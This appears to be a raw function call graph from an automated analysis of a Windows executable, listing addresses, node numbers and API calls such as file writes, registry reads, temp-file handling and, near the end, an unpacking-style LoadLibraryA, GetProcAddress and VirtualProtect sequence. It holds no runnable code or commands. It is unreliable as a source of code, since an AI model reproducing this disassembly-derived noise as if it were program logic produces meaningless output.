4df38e 104863->104835 104864->104830 104865->104830 104866->104834 104867->104863 104876 4e6961 104868->104876 104870 4e7192 104870->104847 104871->104844 104872->104847 104873->104851 104874->104853 104875->104855 104879 4e696d _flsall 104876->104879 104877 4e697f 104878 4d889e __cftoe2_l 47 API calls 104877->104878 104880 4e6984 104878->104880 104879->104877 104881 4e69b6 104879->104881 104882 4d7aa0 __cftoe2_l 8 API calls 104880->104882 104883 4e6a28 __wsopen_helper 110 API calls 104881->104883 104886 4e698e _flsall 104882->104886 104884 4e69d3 104883->104884 104885 4e69fc __wsopen_helper RtlLeaveCriticalSection 104884->104885 104885->104886 104886->104870 104891 4b3ec5 104887->104891 104890 4b3ef0 LoadLibraryA GetProcAddress 104890->104763 104892 4b3e91 104891->104892 104893 4b3ece LoadLibraryA 104891->104893 104892->104763 104892->104890 104893->104892 104894 4b3edf GetProcAddress 104893->104894 104894->104892 104896 4d010a 48 API calls 104895->104896 104897 4b4be0 104896->104897 104897->104772 104899 4b320c FindResourceExW 104898->104899 104903 4b3229 104898->104903 104900 5257d3 LoadResource 104899->104900 104899->104903 104901 5257e8 SizeofResource 104900->104901 104900->104903 104902 5257fc LockResource 104901->104902 104901->104903 104902->104903 104903->104773 104905 4b41b6 104904->104905 104906 52589d 104904->104906 104910 4d471d 104905->104910 104908 4b41c4 104908->104784 104909->104773 104914 4d4729 _flsall 104910->104914 104911 4d4737 104923 4d889e 47 API calls __getptd_noexit 104911->104923 104913 4d475d 104925 4d5a9f 104913->104925 104914->104911 104914->104913 104915 4d473c 104924 4d7aa0 8 API calls __cftoe2_l 104915->104924 104917 4d4763 104931 4d468e 81 API calls 4 library calls 104917->104931 104920 4d4772 104932 4d4794 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104920->104932 104922 4d4747 _flsall 104922->104908 104923->104915 104924->104922 104926 4d5aaf 104925->104926 104927 4d5ad1 RtlEnterCriticalSection 104925->104927 104926->104927 104928 4d5ab7 104926->104928 104929 4d5ac7 104927->104929 104930 4d8984 __lock 47 API calls 104928->104930 104929->104917 104930->104929 104931->104920 104932->104922 104936 4d44c9 104933->104936 104935 4b41a0 104935->104792 104937 4d44d5 _flsall 104936->104937 104938 4d4518 104937->104938 104939 4d44eb _memset 104937->104939 104940 4d4510 _flsall 104937->104940 104941 4d5a9f __lock_file 48 API calls 104938->104941 104949 4d889e 47 API calls __getptd_noexit 104939->104949 104940->104935 104943 4d451e 104941->104943 104951 4d42eb 62 API calls 5 library calls 104943->104951 104944 4d4505 104950 4d7aa0 8 API calls __cftoe2_l 104944->104950 104946 4d4534 104952 4d4552 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104946->104952 104949->104944 104950->104940 104951->104946 104952->104940 104956 4d40da GetSystemTimeAsFileTime 104953->104956 104955 4fc6af 104955->104794 104957 4d4108 __aulldiv 104956->104957 104957->104955 104959 4d4b01 _flsall 104958->104959 104960 4d4b0f 104959->104960 104961 4d4b24 104959->104961 104972 4d889e 47 API calls __getptd_noexit 104960->104972 104963 4d5a9f __lock_file 48 API calls 104961->104963 104965 4d4b2a 104963->104965 104964 4d4b14 104973 4d7aa0 8 API calls __cftoe2_l 104964->104973 104974 4d479c 55 API calls 5 library calls 104965->104974 104968 4d4b35 104975 4d4b55 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104968->104975 104970 4d4b47 104971 4d4b1f _flsall 104970->104971 104971->104799 104972->104964 104973->104971 104974->104968 104975->104970 104981 4fce6d __tzset_nolock _wcscmp 104976->104981 104977 4b417d 64 API calls 104977->104981 104978 4fcd03 104978->104715 104978->104742 104979 4fc846 GetSystemTimeAsFileTime 104979->104981 104980 4b41a7 83 API calls 104980->104981 104981->104977 104981->104978 104981->104979 104981->104980 104982->104741 104984 4d4280 _flsall 104983->104984 104985 4d42ac 104984->104985 104986 4d4294 104984->104986 104989 4d42a4 _flsall 104985->104989 104990 4d5a9f __lock_file 48 API calls 104985->104990 105012 4d889e 47 API calls __getptd_noexit 104986->105012 104988 4d4299 105013 4d7aa0 8 API calls __cftoe2_l 104988->105013 104989->104750 104992 4d42be 104990->104992 104996 4d4208 104992->104996 104997 4d422b 104996->104997 104998 4d4217 104996->104998 105000 4d4227 104997->105000 105015 4d3914 104997->105015 105055 4d889e 47 API calls __getptd_noexit 104998->105055 105014 4d42e3 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 105000->105014 105002 4d421c 105056 4d7aa0 8 API calls __cftoe2_l 105002->105056 105008 4d4245 105032 4df782 105008->105032 105010 4d424b 105010->105000 105011 4d28ca _free 47 API calls 105010->105011 105011->105000 105012->104988 105013->104989 105014->104989 105016 4d3927 105015->105016 105017 4d394b 105015->105017 105016->105017 105018 4d35c3 __flswbuf 47 API calls 105016->105018 105021 4df8e6 105017->105021 105019 4d3944 105018->105019 105057 4dbd14 105019->105057 105022 4d423f 105021->105022 105023 4df8f3 105021->105023 105025 4d35c3 105022->105025 105023->105022 105024 4d28ca _free 47 API calls 105023->105024 105024->105022 105026 4d35cd 105025->105026 105027 4d35e2 105025->105027 105163 4d889e 47 API calls __getptd_noexit 105026->105163 105027->105008 105029 4d35d2 105164 4d7aa0 8 API calls __cftoe2_l 105029->105164 105031 4d35dd 105031->105008 105033 4df78e _flsall 105032->105033 105034 4df796 105033->105034 105039 4df7ae 105033->105039 105180 4d886a 47 API calls __getptd_noexit 105034->105180 105035 4df82b 105184 4d886a 47 API calls __getptd_noexit 105035->105184 105037 4df79b 105181 4d889e 47 API calls __getptd_noexit 105037->105181 105039->105035 105042 4df7d8 105039->105042 105041 4df830 105185 4d889e 47 API calls __getptd_noexit 105041->105185 105044 4db6a0 ___lock_fhandle 49 API calls 105042->105044 105046 4df7de 105044->105046 105045 4df838 105186 4d7aa0 8 API calls __cftoe2_l 105045->105186 105048 4df7fc 105046->105048 105049 4df7f1 105046->105049 105182 4d889e 47 API calls __getptd_noexit 105048->105182 105165 4df84c 105049->105165 105050 4df7a3 _flsall 105050->105010 105053 4df7f7 105183 4df823 RtlLeaveCriticalSection __unlock_fhandle 105053->105183 105055->105002 105056->105000 105058 4dbd20 _flsall 105057->105058 105059 4dbd28 105058->105059 105060 4dbd40 105058->105060 105155 4d886a 47 API calls __getptd_noexit 105059->105155 105061 4dbdd5 105060->105061 105066 4dbd72 105060->105066 105160 4d886a 47 API calls __getptd_noexit 105061->105160 105064 4dbd2d 105156 4d889e 47 API calls __getptd_noexit 105064->105156 105082 4db6a0 105066->105082 105067 4dbdda 105161 4d889e 47 API calls __getptd_noexit 105067->105161 105070 4dbd78 105072 4dbd9e 105070->105072 105073 4dbd8b 105070->105073 105071 4dbde2 105162 4d7aa0 8 API calls __cftoe2_l 105071->105162 105157 4d889e 47 API calls __getptd_noexit 105072->105157 105091 4dbdf6 105073->105091 105075 4dbd35 _flsall 105075->105017 105078 4dbd97 105159 4dbdcd RtlLeaveCriticalSection __unlock_fhandle 105078->105159 105079 4dbda3 105158 4d886a 47 API calls __getptd_noexit 105079->105158 105083 4db6ac _flsall 105082->105083 105084 4db6f9 RtlEnterCriticalSection 105083->105084 105085 4d8984 __lock 47 API calls 105083->105085 105086 4db71f _flsall 105084->105086 105087 4db6d0 105085->105087 105086->105070 105088 4db6ed 105087->105088 105089 4db6db InitializeCriticalSectionAndSpinCount 105087->105089 105090 4db723 ___lock_fhandle RtlLeaveCriticalSection 105088->105090 105089->105088 105090->105084 105092 4dbe03 __ftell_nolock 105091->105092 105093 4dbe35 105092->105093 105094 4dbe5f 105092->105094 105095 4dbe40 105092->105095 105096 4db4bf __crtGetStringTypeA_stat 6 API calls 105093->105096 105098 4dbe9c 105094->105098 105099 4dbeb8 105094->105099 105097 4d886a __lseeki64 47 API calls 105095->105097 105100 4dc61e 105096->105100 105101 4dbe45 105097->105101 105102 4d886a __lseeki64 47 API calls 105098->105102 105104 4dbecf 105099->105104 105107 4e05df __lseeki64_nolock 49 API calls 105099->105107 105100->105078 105103 4d889e __cftoe2_l 47 API calls 105101->105103 105105 4dbea1 105102->105105 105106 4dbe4c 105103->105106 105108 4e49a2 __flswbuf 47 API calls 105104->105108 105109 4d889e __cftoe2_l 47 API calls 105105->105109 105110 4d7aa0 __cftoe2_l 8 API calls 105106->105110 105107->105104 105111 4dbedd 105108->105111 105112 4dbea8 105109->105112 105110->105093 105113 4dc1fe 105111->105113 105117 4d869d _wcstok 47 API calls 105111->105117 105116 4d7aa0 __cftoe2_l 8 API calls 105112->105116 105114 4dc56b WriteFile 105113->105114 105115 4dc216 105113->105115 105119 4dc594 GetLastError 105114->105119 105127 4dc1c3 105114->105127 105118 4dc30d 105115->105118 105128 4dc22c 105115->105128 105116->105093 105120 4dbf03 GetConsoleMode 105117->105120 105126 4dc318 105118->105126 105130 4dc416 105118->105130 105119->105127 105120->105113 105122 4dbf3c 105120->105122 105121 4dc5ce 105121->105093 105125 4d889e __cftoe2_l 47 API calls 105121->105125 105122->105113 105123 4dbf4c GetConsoleCP 105122->105123 105123->105127 105149 4dbf75 105123->105149 105124 4dc29c WriteFile 105124->105119 105129 4dc2d9 105124->105129 105131 4dc5f6 105125->105131 105126->105121 105135 4dc391 WriteFile 105126->105135 105127->105093 105127->105121 105132 4dc5aa 105127->105132 105128->105121 105128->105124 105129->105127 105129->105128 105141 4dc308 105129->105141 105130->105121 105136 4dc48b WideCharToMultiByte 105130->105136 105137 4d886a __lseeki64 47 API calls 105131->105137 105133 4dc5c5 105132->105133 105134 4dc5b1 105132->105134 105139 4d887d __dosmaperr 47 API calls 105133->105139 105138 4d889e __cftoe2_l 47 API calls 105134->105138 105135->105119 105140 4dc3e0 105135->105140 105136->105119 105147 4dc4d2 105136->105147 105137->105093 105142 4dc5b6 105138->105142 105139->105093 105140->105126 105140->105127 105140->105141 105141->105127 105144 4d886a __lseeki64 47 API calls 105142->105144 105143 4dc4da WriteFile 105145 4dc52d GetLastError 105143->105145 105143->105147 105144->105093 105145->105147 105146 4d22a8 __chsize_nolock 57 API calls 105146->105149 105147->105127 105147->105130 105147->105141 105147->105143 105148 4e4ea7 59 API calls __chsize_nolock 105148->105149 105149->105127 105149->105146 105149->105148 105150 4dc042 WideCharToMultiByte 105149->105150 105151 4dc0a9 105149->105151 105150->105127 105152 4dc07d WriteFile 105150->105152 105151->105119 105151->105127 105151->105149 105153 4e6634 WriteConsoleW CreateFileW __chsize_nolock 105151->105153 105154 4dc0d4 WriteFile 105151->105154 105152->105119 105152->105151 105153->105151 105154->105119 105154->105151 105155->105064 105156->105075 105157->105079 105158->105078 105159->105075 105160->105067 105161->105071 105162->105075 105163->105029 105164->105031 105187 4db957 105165->105187 105167 4df8b0 105200 4db8d1 48 API calls 2 library calls 105167->105200 105168 4df85a 105168->105167 105171 4db957 __lseek_nolock 47 API calls 105168->105171 105179 4df88e 105168->105179 105170 4df8b8 105176 4df8da 105170->105176 105201 4d887d 47 API calls 3 library calls 105170->105201 105173 4df885 105171->105173 105172 4db957 __lseek_nolock 47 API calls 105174 4df89a CloseHandle 105172->105174 105177 4db957 __lseek_nolock 47 API calls 105173->105177 105174->105167 105178 4df8a6 GetLastError 105174->105178 105176->105053 105177->105179 105178->105167 105179->105167 105179->105172 105180->105037 105181->105050 105182->105053 105183->105050 105184->105041 105185->105045 105186->105050 105188 4db977 105187->105188 105189 4db962 105187->105189 105192 4d886a __lseeki64 47 API calls 105188->105192 105194 4db99c 105188->105194 105190 4d886a __lseeki64 47 API calls 105189->105190 105191 4db967 105190->105191 105193 4d889e __cftoe2_l 47 API calls 105191->105193 105195 4db9a6 105192->105195 105196 4db96f 105193->105196 105194->105168 105197 4d889e __cftoe2_l 47 API calls 105195->105197 105196->105168 105198 4db9ae 105197->105198 105199 4d7aa0 __cftoe2_l 8 API calls 105198->105199 105199->105196 105200->105170 105201->105176 105202->104629 105203->104632 105204->104636 105205->104649 105206->104651 105207->104648 105208->104656 105209->104662 105210->104676 105211->104674 105213 524aa5 GetFullPathNameW 105212->105213 105214 4b31c7 105212->105214 105216 524abd 105213->105216 105269 4b3bcf 105214->105269 105217 4b31cd GetFullPathNameW 105218 4b31e7 105217->105218 105218->104496 105220 4b3a8b SHGetDesktopFolder 105219->105220 105223 4b3ade 105219->105223 105221 4b3a99 105220->105221 105220->105223 105222 4b3ac8 SHGetPathFromIDListW 105221->105222 105221->105223 105222->105223 105223->104498 105225 4b3ba9 105224->105225 105226 4b3b72 105224->105226 105225->105226 105227 4d1bc7 _W_store_winword 59 API calls 105225->105227 105230 5233e5 105225->105230 105228 4b3bcf 48 API calls 105226->105228 105227->105225 105229 4b3b7d 105228->105229 105273 4b197e 105229->105273 105233 4b197e 48 API calls 105234 4b3b9f 105233->105234 105235 4b3dcb 105234->105235 105236 4b3f9b 136 API calls 105235->105236 105238 4b3def 105236->105238 105237 5239f9 105240 4fcc82 122 API calls 105237->105240 105238->105237 105239 4b3f9b 136 API calls 105238->105239 105241 4b3e02 105239->105241 105242 523a0e 105240->105242 105241->105237 105243 4b3e0a 105241->105243 105244 523a12 105242->105244 105245 523a2f 105242->105245 105247 523a1a 105243->105247 105248 4b3e16 105243->105248 105249 4b3e39 84 API calls 105244->105249 105246 4d010a 48 API calls 105245->105246 105268 523a74 Mailbox 105246->105268 105295 4f757b 87 API calls _wprintf 105247->105295 105294 4bbdf0 163 API calls 8 library calls 105248->105294 105249->105247 105252 523a28 105252->105245 105253 4b3e2e 105253->104500 105254 523c24 105255 4d28ca _free 47 API calls 105254->105255 105256 523c2c 105255->105256 105257 4b3e39 84 API calls 105256->105257 105262 523c35 105257->105262 105261 4d28ca _free 47 API calls 105261->105262 105262->105261 105263 4b3e39 84 API calls 105262->105263 105299 4f32b0 86 API calls 4 library calls 105262->105299 105263->105262 105265 4bcaee 48 API calls 105265->105268 105268->105254 105268->105262 105268->105265 105279 4bb6d0 105268->105279 105288 4ba870 105268->105288 105296 4f30ac 48 API calls _memmove 105268->105296 105297 4f2fcd 60 API calls 2 library calls 105268->105297 105298 4fa525 48 API calls 105268->105298 105270 4b3bd9 __wsetenvp 105269->105270 105271 4d010a 48 API calls 105270->105271 105272 4b3bee _wcscpy 105271->105272 105272->105217 105274 4b1990 105273->105274 105278 4b19af _memmove 105273->105278 105276 4d010a 48 API calls 105274->105276 105275 4d010a 48 API calls 105277 4b19c6 105275->105277 105276->105278 105277->105233 105278->105275 105280 4bb789 105279->105280 105283 4bb6e3 _memmove 105279->105283 105282 4d010a 48 API calls 105280->105282 105281 4d010a 48 API calls 105284 4bb6ea 105281->105284 105282->105283 105283->105281 105285 4bb71b 105284->105285 105286 4d010a 48 API calls 105284->105286 105285->105268 105287 4bb74d 105286->105287 105287->105268 105289 4ba883 105288->105289 105291 4ba93d 105288->105291 105290 4d010a 48 API calls 105289->105290 105289->105291 105292 4ba8c1 105289->105292 105290->105292 105291->105268 105292->105291 105293 4d010a 48 API calls 105292->105293 105293->105292 105294->105253 105295->105252 105296->105268 105297->105268 105298->105268 105299->105262 105301 4ba848 105300->105301 105302 4ba72c 105300->105302 105301->104506 105302->105301 105303 4d010a 48 API calls 105302->105303 105304 4ba753 105303->105304 105305 4d010a 48 API calls 105304->105305 105306 4ba7c5 105305->105306 105306->105301 105309 4ba870 48 API calls 105306->105309 105310 4bb6d0 48 API calls 105306->105310 105313 4bace0 91 API calls 2 library calls 105306->105313 105314 4fa3ee 48 API calls 105306->105314 105309->105306 105310->105306 105311->104509 105312->104511 105313->105306 105314->105306 105316 4b31a2 LoadImageW 105315->105316 105317 524ad8 EnumResourceNamesW 105315->105317 105318 4b3118 RegisterClassExW 105316->105318 105317->105318 105319 4b2f58 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 105318->105319 105320 4b2fe9 LoadIconW 105319->105320 105322 4b301e 105320->105322 105322->104526 105324 4be80f 105323->105324 105325 4be7fd 105323->105325 105414 4fd520 86 API calls 4 library calls 105324->105414 105413 4bdcd0 346 API calls 2 library calls 105325->105413 105328 4be806 105328->104587 105329 5298e8 105329->105329 105331 4bea20 105330->105331 105337 4bea89 105331->105337 105415 4bfa40 346 API calls 3 library calls 105331->105415 105333 5299bc 105419 4fd520 86 API calls 4 library calls 105333->105419 105334 529919 105334->105337 105416 4fd520 86 API calls 4 library calls 105334->105416 105335 4bfa40 346 API calls 105362 4becd7 Mailbox 105335->105362 105340 4bd3d2 48 API calls 105337->105340 105355 4beb18 105337->105355 105337->105362 105338 4bd3d2 48 API calls 105341 529997 105338->105341 105342 529963 105340->105342 105418 4d1b2a 52 API calls __cinit 105341->105418 105417 4d1b2a 52 API calls __cinit 105342->105417 105343 4fd520 86 API calls 105343->105362 105346 4bd380 55 API calls 105346->105362 105348 529d70 105429 50e2fb 346 API calls Mailbox 105348->105429 105349 529e49 105434 4fd520 86 API calls 4 library calls 105349->105434 105350 529dc2 105431 4fd520 86 API calls 4 library calls 105350->105431 105351 529ddf 105432 50c235 346 API calls Mailbox 105351->105432 105355->105338 105355->105362 105358 4b342c 48 API calls 105358->105362 105360 529df7 105363 4bef0c Mailbox 105360->105363 105433 4fd520 86 API calls 4 library calls 105360->105433 105361 4c14a0 48 API calls 105361->105362 105362->105333 105362->105335 105362->105343 105362->105346 105362->105348 105362->105349 105362->105350 105362->105351 105362->105358 105362->105361 105362->105363 105364 4bf56f 105362->105364 105367 4bd805 48 API calls 105362->105367 105368 529a3c 105362->105368 105420 4fa3ee 48 API calls 105362->105420 105421 50ede9 346 API calls 105362->105421 105427 4ea599 InterlockedDecrement 105362->105427 105428 50f4df 346 API calls 105362->105428 105363->104587 105364->105363 105430 4fd520 86 API calls 4 library calls 105364->105430 105367->105362 105422 50d154 48 API calls 105368->105422 105370 529a48 105372 529a56 105370->105372 105373 529a9b 105370->105373 105423 4fa485 48 API calls 105372->105423 105376 529a91 Mailbox 105373->105376 105424 4fafce 48 API calls 105373->105424 105426 4bfa40 346 API calls 3 library calls 105376->105426 105378 529ad8 105425 4cdf08 48 API calls 105378->105425 105381 4c469f 105380->105381 105382 4c4537 105380->105382 105383 4bcaee 48 API calls 105381->105383 105384 527820 105382->105384 105385 4c4543 105382->105385 105392 4c45e4 Mailbox 105383->105392 105483 50e713 346 API calls Mailbox 105384->105483 105482 4c4040 346 API calls _memmove 105385->105482 105388 52782c 105389 4c4639 Mailbox 105388->105389 105484 4fd520 86 API calls 4 library calls 105388->105484 105389->104587 105391 4c4559 105391->105388 105391->105389 105391->105392 105393 4b3e39 84 API calls 105392->105393 105435 4cdd84 105392->105435 105438 510bfa 105392->105438 105441 5001e4 105392->105441 105393->105389 105397->104587 105398->104587 105399->104587 105400->104587 105401->104541 105402->104534 105403->104539 105404->104587 105405->104587 105406->104583 105407->104583 105408->104583 105409->104587 105410->104583 105411->104583 105412->104583 105413->105328 105414->105329 105415->105334 105416->105337 105417->105355 105418->105362 105419->105363 105420->105362 105421->105362 105422->105370 105423->105376 105424->105378 105425->105376 105426->105363 105427->105362 105428->105362 105429->105364 105430->105363 105431->105363 105432->105360 105433->105363 105434->105363 105485 4cdd92 GetFileAttributesW 105435->105485 105490 50f79f 105438->105490 105440 510c0a 105440->105389 105442 500218 105441->105442 105443 50020d 105441->105443 105445 4b84a6 81 API calls 105442->105445 105640 4bcdb4 48 API calls 105443->105640 105446 500232 105445->105446 105447 500254 105446->105447 105448 50033c 105446->105448 105457 500366 105446->105457 105449 4b84a6 81 API calls 105447->105449 105450 4b3f9b 136 API calls 105448->105450 105455 500260 _wcscpy _wcschr 105449->105455 105451 50034d 105450->105451 105452 500362 105451->105452 105453 4b3f9b 136 API calls 105451->105453 105454 4b84a6 81 API calls 105452->105454 105452->105457 105453->105452 105456 50039b 105454->105456 105459 5002b2 _wcscat 105455->105459 105463 500284 _wcscat _wcscpy 105455->105463 105576 4d297d 105456->105576 105457->105389 105460 4b84a6 81 API calls 105459->105460 105462 5002d0 _wcscpy 105460->105462 105461 5003bf _wcscat _wcscpy 105470 4b84a6 81 API calls 105461->105470 105641 4f7c0c GetFileAttributesW 105462->105641 105465 4b84a6 81 API calls 105463->105465 105465->105459 105466 5002f0 __wsetenvp 105466->105457 105467 4b84a6 81 API calls 105466->105467 105468 50031c 105467->105468 105642 4f6b3f 77 API calls 4 library calls 105468->105642 105471 500456 105470->105471 105579 4f7334 105471->105579 105472 500330 105472->105457 105474 500476 105475 4cdd84 3 API calls 105474->105475 105476 500485 105475->105476 105477 4b84a6 81 API calls 105476->105477 105479 5004b6 105476->105479 105478 50049f 105477->105478 105585 4fc890 105478->105585 105481 4b3e39 84 API calls 105479->105481 105481->105457 105482->105391 105483->105388 105484->105389 105486 4cdd89 105485->105486 105487 524a7d FindFirstFileW 105485->105487 105486->105389 105488 524a95 FindClose 105487->105488 105489 524a8e 105487->105489 105489->105488 105491 4b84a6 81 API calls 105490->105491 105492 50f7db 105491->105492 105516 50f81d Mailbox 105492->105516 105526 510458 105492->105526 105494 50fa7c 105495 50fbeb 105494->105495 105499 50fa86 105494->105499 105562 510579 89 API calls Mailbox 105495->105562 105498 50fbf8 105498->105499 105501 50fc04 105498->105501 105539 50f5fb 105499->105539 105500 4b84a6 81 API calls 105520 50f875 Mailbox 105500->105520 105501->105516 105506 50faba 105553 4cf92c 105506->105553 105509 50fad4 105559 4fd520 86 API calls 4 library calls 105509->105559 105510 50faee 105512 4b3320 48 API calls 105510->105512 105514 50fb05 105512->105514 105513 50fadf GetCurrentProcess TerminateProcess 105513->105510 105517 4c14a0 48 API calls 105514->105517 105525 50fb2f 105514->105525 105515 50fc56 105515->105516 105522 50fc6f FreeLibrary 105515->105522 105516->105440 105518 50fb1e 105517->105518 105560 510300 105 API calls _free 105518->105560 105520->105494 105520->105500 105520->105516 105557 5128d9 48 API calls _memmove 105520->105557 105558 50fc96 60 API calls 2 library calls 105520->105558 105521 4c14a0 48 API calls 105521->105525 105522->105516 105525->105515 105525->105521 105561 4bd89e 50 API calls Mailbox 105525->105561 105563 510300 105 API calls _free 105525->105563 105527 4bb8a7 48 API calls 105526->105527 105528 510473 CharLowerBuffW 105527->105528 105564 50267a 105528->105564 105532 4bd3d2 48 API calls 105533 5104ac 105532->105533 105571 4b7f40 48 API calls _memmove 105533->105571 105535 5104c3 105536 4ba2fb 48 API calls 105535->105536 105538 5104cf Mailbox 105536->105538 105537 51050b Mailbox 105537->105520 105538->105537 105572 50fc96 60 API calls 2 library calls 105538->105572 105540 50f616 105539->105540 105544 50f66b 105539->105544 105541 4d010a 48 API calls 105540->105541 105542 50f638 105541->105542 105543 4d010a 48 API calls 105542->105543 105542->105544 105543->105542 105545 510719 105544->105545 105546 510944 Mailbox 105545->105546 105549 51073c _strcat _wcscpy __wsetenvp 105545->105549 105546->105506 105547 4bcdb4 48 API calls 105547->105549 105548 4bd00b 58 API calls 105548->105549 105549->105546 105549->105547 105549->105548 105550 4d45ec 47 API calls __crtGetStringTypeA_stat 105549->105550 105551 4b84a6 81 API calls 105549->105551 105575 4f8932 50 API calls __wsetenvp 105549->105575 105550->105549 105551->105549 105555 4cf941 105553->105555 105554 4cf9d9 VirtualProtect 105556 4cf9a7 105554->105556 105555->105554 105555->105556 105556->105509 105556->105510 105557->105520 105558->105520 105559->105513 105560->105525 105561->105525 105562->105498 105563->105525 105565 5026a4 __wsetenvp 105564->105565 105566 5026e2 105565->105566 105568 5026d8 105565->105568 105569 502763 105565->105569 105566->105532 105566->105538 105568->105566 105573 4cdfd2 60 API calls 105568->105573 105569->105566 105574 4cdfd2 60 API calls 105569->105574 105571->105535 105572->105537 105573->105568 105574->105569 105575->105549 105643 4d29c7 105576->105643 105580 4f7341 _wcschr __ftell_nolock 105579->105580 105581 4d297d __wsplitpath 47 API calls 105580->105581 105584 4f7357 _wcscat _wcscpy 105580->105584 105582 4f7389 105581->105582 105583 4d297d __wsplitpath 47 API calls 105582->105583 105583->105584 105584->105474 105586 4fc89d __ftell_nolock 105585->105586 105587 4d010a 48 API calls 105586->105587 105588 4fc8fa 105587->105588 105589 4b4bce 48 API calls 105588->105589 105590 4fc904 105589->105590 105591 4fc6a0 GetSystemTimeAsFileTime 105590->105591 105592 4fc90f 105591->105592 105593 4b41a7 83 API calls 105592->105593 105594 4fc922 _wcscmp 105593->105594 105595 4fc946 105594->105595 105596 4fc9f3 105594->105596 105597 4fce59 94 API calls 105595->105597 105598 4fce59 94 API calls 105596->105598 105599 4fc94b 105597->105599 105600 4fc9bf _wcscat 105598->105600 105601 4d297d __wsplitpath 47 API calls 105599->105601 105623 4fc9fc 105599->105623 105602 4b417d 64 API calls 105600->105602 105600->105623 105606 4fc974 _wcscat _wcscpy 105601->105606 105603 4fca18 105602->105603 105604 4b417d 64 API calls 105603->105604 105605 4fca28 105604->105605 105607 4b417d 64 API calls 105605->105607 105608 4d297d __wsplitpath 47 API calls 105606->105608 105609 4fca43 105607->105609 105608->105600 105610 4b417d 64 API calls 105609->105610 105611 4fca53 105610->105611 105612 4b417d 64 API calls 105611->105612 105613 4fca6e 105612->105613 105614 4b417d 64 API calls 105613->105614 105615 4fca7e 105614->105615 105616 4b417d 64 API calls 105615->105616 105617 4fca8e 105616->105617 105618 4b417d 64 API calls 105617->105618 105619 4fca9e 105618->105619 105669 4fd009 GetTempPathW GetTempFileNameW 105619->105669 105621 4fcaaa 105622 4d4129 117 API calls 105621->105622 105634 4fcabb 105622->105634 105623->105479 105624 4fcb75 105625 4d4274 __fcloseall 83 API calls 105624->105625 105626 4fcb80 105625->105626 105628 4fcb9a 105626->105628 105629 4fcb86 DeleteFileW 105626->105629 105627 4b417d 64 API calls 105627->105634 105630 4fcc2e CopyFileW 105628->105630 105635 4fcba4 105628->105635 105629->105623 105631 4fcc56 DeleteFileW 105630->105631 105632 4fcc44 DeleteFileW 105630->105632 105683 4fcfc8 CreateFileW 105631->105683 105632->105623 105634->105623 105634->105624 105634->105627 105670 4d373e 105634->105670 105686 4fc251 118 API calls __fcloseall 105635->105686 105638 4fcc19 105638->105631 105639 4fcc1d DeleteFileW 105638->105639 105639->105623 105640->105442 105641->105466 105642->105472 105644 4d29d6 105643->105644 105645 4d29e2 105643->105645 105644->105645 105655 4d2a55 105644->105655 105662 4da9fb 47 API calls __cftoe2_l 105644->105662 105667 4d889e 47 API calls __getptd_noexit 105645->105667 105647 4d2b9a 105651 4d29c2 105647->105651 105668 4d7aa0 8 API calls __cftoe2_l 105647->105668 105650 4d2b21 105650->105645 105650->105651 105653 4d2b31 105650->105653 105651->105461 105652 4d2ae0 105652->105645 105654 4d2afc 105652->105654 105664 4da9fb 47 API calls __cftoe2_l 105652->105664 105666 4da9fb 47 API calls __cftoe2_l 105653->105666 105654->105645 105654->105651 105658 4d2b12 105654->105658 105655->105645 105661 4d2ac2 105655->105661 105663 4da9fb 47 API calls __cftoe2_l 105655->105663 105665 4da9fb 47 API calls __cftoe2_l 105658->105665 105661->105650 105661->105652 105662->105655 105663->105661 105664->105654 105665->105651 105666->105651 105667->105647 105668->105651 105669->105621 105671 4d374a _flsall 105670->105671 105672 4d377c 105671->105672 105673 4d3764 105671->105673 105675 4d3774 _flsall 105671->105675 105676 4d5a9f __lock_file 48 API calls 105672->105676 105699 4d889e 47 API calls __getptd_noexit 105673->105699 105675->105634 105677 4d3782 105676->105677 105687 4d35e7 105677->105687 105678 4d3769 105700 4d7aa0 8 API calls __cftoe2_l 105678->105700 105684 4fcfee SetFileTime CloseHandle 105683->105684 105685 4fd004 105683->105685 105684->105685 105685->105623 105686->105638 105689 4d35f6 105687->105689 105694 4d3614 105687->105694 105688 4d3604 105702 4d889e 47 API calls __getptd_noexit 105688->105702 105689->105688 105689->105694 105697 4d362c _memmove 105689->105697 105691 4d3609 105703 4d7aa0 8 API calls __cftoe2_l 105691->105703 105701 4d37b4 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 105694->105701 105695 4d3914 __flush 78 API calls 105695->105697 105696 4d35c3 __flswbuf 47 API calls 105696->105697 105697->105694 105697->105695 105697->105696 105698 4dbd14 __flswbuf 78 API calls 105697->105698 105704 4d9af3 78 API calls 4 library calls 105697->105704 105698->105697 105699->105678 105700->105675 105701->105675 105702->105691 105703->105694 105704->105697 105705 5eb090 105706 5eb0a0 105705->105706 105707 5eb1ba LoadLibraryA 105706->105707 105711 5eb1ff VirtualProtect VirtualProtect 105706->105711 105708 5eb1d1 105707->105708 105708->105706 105710 5eb1e3 GetProcAddress 105708->105710 105710->105708 105713 5eb1f9 ExitProcess 105710->105713 105712 5eb264 105711->105712 105712->105712 105714 4fc450 105715 4fc45d 105714->105715 105716 4fc463 105714->105716 105717 4d28ca _free 47 API calls 105715->105717 105718 4fc474 105716->105718 105719 4d28ca _free 47 API calls 105716->105719 105717->105716 105720 4fc486 105718->105720 105721 4d28ca _free 47 API calls 105718->105721 105719->105718 105721->105720 105722 521eed 105727 4ce975 105722->105727 105724 521f01 105743 4d1b2a 52 API calls __cinit 105724->105743 105726 521f0b 105728 4d010a 48 API calls 105727->105728 105729 4cea27 GetModuleFileNameW 105728->105729 105730 4d297d __wsplitpath 47 API calls 105729->105730 105731 4cea5b _wcsncat 105730->105731 105744 4d2bff 105731->105744 105734 4d010a 48 API calls 105735 4cea94 _wcscpy 105734->105735 105736 4bd3d2 48 API calls 105735->105736 105737 4ceacf 105736->105737 105747 4ceb05 105737->105747 105739 4ceae0 Mailbox 105739->105724 105740 4ba4f6 48 API calls 105742 4ceada _wcscat __wsetenvp _wcsncpy 105740->105742 105741 4d010a 48 API calls 105741->105742 105742->105739 105742->105740 105742->105741 105743->105726 105761 4daab9 105744->105761 105773 4bc4cd 105747->105773 105749 4ceb14 RegOpenKeyExW 105750 524b17 RegQueryValueExW 105749->105750 105751 4ceb35 105749->105751 105752 524b30 105750->105752 105753 524b91 RegCloseKey 105750->105753 